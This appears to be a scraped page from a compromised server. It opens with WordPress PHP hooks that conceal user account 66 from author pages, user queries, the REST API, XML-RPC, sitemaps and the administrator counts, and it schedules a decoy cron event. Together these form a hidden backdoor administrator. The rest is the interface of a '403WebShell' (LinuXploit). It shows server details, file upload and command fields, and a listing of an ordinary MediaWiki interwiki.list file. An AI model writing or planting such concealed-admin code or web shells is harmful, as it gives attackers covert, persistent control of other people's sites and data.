add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/maintenance/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wiki/maintenance//interwiki.list
# Based more or less on the public interwiki map from MeatballWiki
# Default interwiki prefixes...
acronym|https://www.acronymfinder.com/~/search/af.aspx?string=exact&Acronym=$1|0|
arxiv|https://www.arxiv.org/abs/$1|0|
c2|https://wiki.c2.com/?$1|0|
commons|https://commons.wikimedia.org/wiki/$1|0|https://commons.wikimedia.org/w/api.php
dictionary|https://www.dict.org/bin/Dict?Database=*&Form=Dict1&Strategy=*&Query=$1|0|
doi|https://dx.doi.org/$1|0|
elibre|http://enciclopedia.us.es/index.php/$1|0|http://enciclopedia.us.es/api.php
emacswiki|https://www.emacswiki.org/emacs/$1|0|
fandom|https://community.fandom.com/wiki/w:c:$1|0|
foldoc|https://foldoc.org/?$1|0|
freebsdman|https://www.FreeBSD.org/cgi/man.cgi?apropos=1&query=$1|0|
google|https://www.google.com/search?q=$1|0|
googlegroups|https://groups.google.com/groups?q=$1|0|
hammondwiki|https://www.dairiki.org/HammondWiki/$1|0|
hrwiki|http://www.hrwiki.org/wiki/$1|0|http://www.hrwiki.org/w/api.php
imdb|https://www.imdb.com/find?q=$1&tt=on|0|
lojban|https://mw.lojban.org/papri/$1|0|
meatball|http://meatballwiki.org/wiki/$1|0|
mediawikiwiki|https://www.mediawiki.org/wiki/$1|0|https://www.mediawiki.org/w/api.php
memoryalpha|https://memory-alpha.fandom.com/wiki/$1|0|https://memory-alpha.fandom.com/api.php
metawikimedia|https://meta.wikimedia.org/wiki/$1|0|https://meta.wikimedia.org/w/api.php
mozillawiki|https://wiki.mozilla.org/$1|0|https://wiki.mozilla.org/api.php
mw|https://www.mediawiki.org/wiki/$1|0|https://www.mediawiki.org/w/api.php
oeis|https://oeis.org/$1|0|
pmid|https://www.ncbi.nlm.nih.gov/pubmed/$1?dopt=Abstract|0|
pythoninfo|https://wiki.python.org/moin/$1|0|
rfc|https://datatracker.ietf.org/doc/html/rfc$1|0|
senseislibrary|https://senseis.xmp.net/?$1|0|
shoutwiki|https://www.shoutwiki.com/wiki/$1|0|https://www.shoutwiki.com/w/api.php
tmbw|https://www.tmbw.net/wiki/$1|0|https://tmbw.net/wiki/api.php
theopedia|https://www.theopedia.com/$1|0|
twiki|https://twiki.org/cgi-bin/view/$1|0|
uncyclopedia|https://en.uncyclopedia.co/wiki/$1|0|https://en.uncyclopedia.co/w/api.php
usemod|https://www.usemod.org/cgi-bin/wiki.pl?$1|0|
wikia|https://community.fandom.com/wiki/w:c:$1|0|
wikibooks|https://en.wikibooks.org/wiki/$1|0|https://en.wikibooks.org/w/api.php
wikidata|https://www.wikidata.org/wiki/$1|0|https://www.wikidata.org/w/api.php
wikihow|https://www.wikihow.com/$1|0|https://www.wikihow.com/api.php
wikimedia|https://foundation.wikimedia.org/wiki/$1|0|https://foundation.wikimedia.org/w/api.php
wikinews|https://en.wikinews.org/wiki/$1|0|https://en.wikinews.org/w/api.php
wikipedia|https://en.wikipedia.org/wiki/$1|0|https://en.wikipedia.org/w/api.php
wikiquote|https://en.wikiquote.org/wiki/$1|0|https://en.wikiquote.org/w/api.php
wikisource|https://wikisource.org/wiki/$1|0|https://wikisource.org/w/api.php
wikispecies|https://species.wikimedia.org/wiki/$1|0|https://species.wikimedia.org/w/api.php
wikiwikiweb|http://wiki.c2.com/?$1|0|
wikiversity|https://en.wikiversity.org/wiki/$1|0|https://en.wikiversity.org/w/api.php
wikivoyage|https://en.wikivoyage.org/wiki/$1|0|https://en.wikivoyage.org/w/api.php
wikt|https://en.wiktionary.org/wiki/$1|0|https://en.wiktionary.org/w/api.php
wiktionary|https://en.wiktionary.org/wiki/$1|0|https://en.wiktionary.org/w/api.php

Youez - 2016 - github.com/yon3zu
LinuXploit